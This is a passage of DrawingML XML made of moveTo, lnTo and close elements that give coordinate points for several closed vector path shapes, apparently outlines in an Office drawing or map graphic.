                <a:lnTo>
                  <a:pt x="7623" y="4117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7628" y="4158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7732" y="4158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7788" y="4145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7835" y="4187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7788" y="4248"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7821" y="4248"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7899" y="4136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7913" y="4158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7887" y="4261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7918" y="4290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7944" y="4280"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7981" y="4168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7976" y="4084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7981" y="4014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7939" y="4033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7970" y="3940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7924" y="3902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7892" y="3930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7852" y="3889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7878" y="3850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7847" y="3818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7805" y="3860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7856" y="3748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7899" y="3664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7913" y="3632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7892" y="3622"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4073" y="3735"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4057" y="3767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4052" y="3837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4099" y="3860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4094" y="3902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4125" y="3940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4125" y="3991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4193" y="4056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4229" y="4033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4229" y="3963"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4198" y="3911"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4193" y="3850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4187" y="3799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4146" y="3786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4120" y="3767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4073" y="3735"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7416" y="3837"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7400" y="3860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7437" y="3921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7499" y="3963"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7524" y="3953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7524" y="3930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7484" y="3879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7416" y="3837"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7359" y="4229"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7333" y="4271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7338" y="4322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7400" y="4373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7421" y="4364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7458" y="4312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7406" y="4312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7369" y="4290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7359" y="4229"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="13552" y="4248"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13604" y="4280"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13656" y="4271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13677" y="4351"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13682" y="4486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13630" y="4466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13588" y="4486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13599" y="4588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13541" y="4579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13548" y="4620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13583" y="4649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13625" y="4774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13692" y="4813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13708" y="4864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13703" y="4916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13708" y="4948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13734" y="5041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13729" y="4938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13769" y="4906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13795" y="4989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13847" y="5070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13807" y="5111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13748" y="5082"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13748" y="5195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13786" y="5204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13781" y="5297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13826" y="5339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13833" y="5480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13852" y="5573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13852" y="5605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13769" y="5634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13687" y="5615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13640" y="5544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13583" y="5512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13557" y="5410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13548" y="5339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13562" y="5307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13567" y="5256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13567" y="5153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13614" y="5143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13593" y="5102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13567" y="5092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13531" y="4999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13489" y="4948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13412" y="4794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13407" y="4701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13345" y="4579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13381" y="4444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13433" y="4425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13449" y="4341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13496" y="4312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13552" y="4248"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12893" y="4261"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12900" y="4290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12827" y="4341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12863" y="4393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12827" y="4505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12790" y="4527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12841" y="4607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12909" y="4659"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12992" y="4774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13018" y="4813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13049" y="4835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13086" y="4887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13107" y="4980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13101" y="5041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13044" y="5111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12997" y="5102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12935" y="5121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12853" y="5070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12749" y="4980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12655" y="4980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12594" y="5018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12530" y="5111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12422" y="5092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12407" y="5195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12318" y="5204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12262" y="5339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12304" y="5400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12283" y="5503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12330" y="5573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12370" y="5708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12433" y="5708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12490" y="5779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12526" y="5759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12537" y="5708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12599" y="5708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12650" y="5779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12738" y="5769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12775" y="5686"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12827" y="5718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12863" y="5708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12841" y="5759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12867" y="5820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12858" y="5872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12867" y="5974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12848" y="6067"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12832" y="6180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12827" y="6212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12822" y="6314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12811" y="6375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12816" y="6385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12801" y="6427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12775" y="6456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12728" y="6446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12681" y="6417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12671" y="6456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12650" y="6385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12608" y="6366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12556" y="6375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12537" y="6417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12495" y="6456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12469" y="6436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12412" y="6395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12356" y="6353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12278" y="6353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12262" y="6314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12205" y="6292"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12184" y="6273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12163" y="6273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12142" y="6212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12064" y="6180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12024" y="6199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11981" y="6263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11967" y="6324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11981" y="6427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11956" y="6488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11930" y="6520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11868" y="6446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11785" y="6385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11734" y="6353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11701" y="6231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11624" y="6170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11578" y="6148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11552" y="6160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11484" y="6109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11463" y="6087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11449" y="6026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11416" y="6026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11407" y="5955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11442" y="5881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11449" y="5769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11428" y="5737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11428" y="5676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11453" y="5615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11449" y="5583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11402" y="5634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11402" y="5564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11360" y="5544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11298" y="5596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11261" y="5605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11235" y="5573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11173" y="5573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11121" y="5625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11091" y="5605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10997" y="5615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10898" y="5634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10841" y="5676"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10806" y="5727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10743" y="5750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10686" y="5820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10660" y="5820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10603" y="5788"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10551" y="5801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10516" y="5737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10504" y="5737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10516" y="5708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10551" y="5657"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10603" y="5657"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10676" y="5657"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10717" y="5554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10759" y="5522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10768" y="5429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10801" y="5368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10780" y="5288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10801" y="5172"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10836" y="5102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10841" y="5060"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10914" y="5031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10966" y="4938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10961" y="4855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10966" y="4774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11044" y="4733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11152" y="4774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11199" y="4701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11220" y="4691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11251" y="4630"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11277" y="4607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11324" y="4649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11350" y="4672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11371" y="4803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11411" y="4887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11463" y="4980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11510" y="5041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11552" y="5050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11578" y="5102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11614" y="5121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11635" y="5185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11661" y="5204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11682" y="5275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11708" y="5358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11696" y="5390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11687" y="5461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11687" y="5503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11708" y="5493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11734" y="5378"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11753" y="5368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11760" y="5297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11717" y="5246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11739" y="5153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11790" y="5172"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11821" y="5236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11831" y="5185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11826" y="5163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11774" y="5092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11734" y="5050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11682" y="4999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11696" y="4967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11682" y="4938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11640" y="4938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11572" y="4826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11541" y="4710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11489" y="4640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11468" y="4569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11475" y="4527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11468" y="4466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11510" y="4415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11552" y="4434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11541" y="4444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11541" y="4495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11557" y="4537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11572" y="4476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11609" y="4495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11614" y="4537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11640" y="4588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11630" y="4598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11682" y="4701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11734" y="4742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11769" y="4794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11821" y="4845"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11842" y="4906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11857" y="4948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11868" y="4957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11878" y="4980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11873" y="5018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11873" y="5111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11878" y="5172"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11909" y="5214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11909" y="5246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11920" y="5256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11925" y="5297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11956" y="5378"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11981" y="5442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11998" y="5532"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12024" y="5647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12071" y="5708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12106" y="5708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12080" y="5583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12116" y="5573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12096" y="5503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12148" y="5544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12142" y="5471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12111" y="5429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12075" y="5368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12096" y="5339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12064" y="5275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12049" y="5195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12059" y="5163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12090" y="5236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12122" y="5236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12148" y="5214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12106" y="5143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12174" y="5111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12205" y="5121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12241" y="5121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12241" y="5153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12262" y="5214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12304" y="5143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12323" y="5102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12391" y="5092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12401" y="5060"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12349" y="5018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12339" y="4967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12318" y="4896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12335" y="4803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12360" y="4752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12365" y="4588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12381" y="4598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12407" y="4569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12401" y="4537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12438" y="4434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12453" y="4364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12500" y="4341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12505" y="4393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12594" y="4425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12615" y="4453"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12568" y="4495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12563" y="4518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12624" y="4556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12620" y="4620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12650" y="4649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12718" y="4569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12775" y="4547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12780" y="4495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12723" y="4505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12692" y="4476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12681" y="4393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12723" y="4341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12775" y="4332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12806" y="4290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12848" y="4280"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12893" y="4261"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18497" y="4425"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18516" y="4537"/>
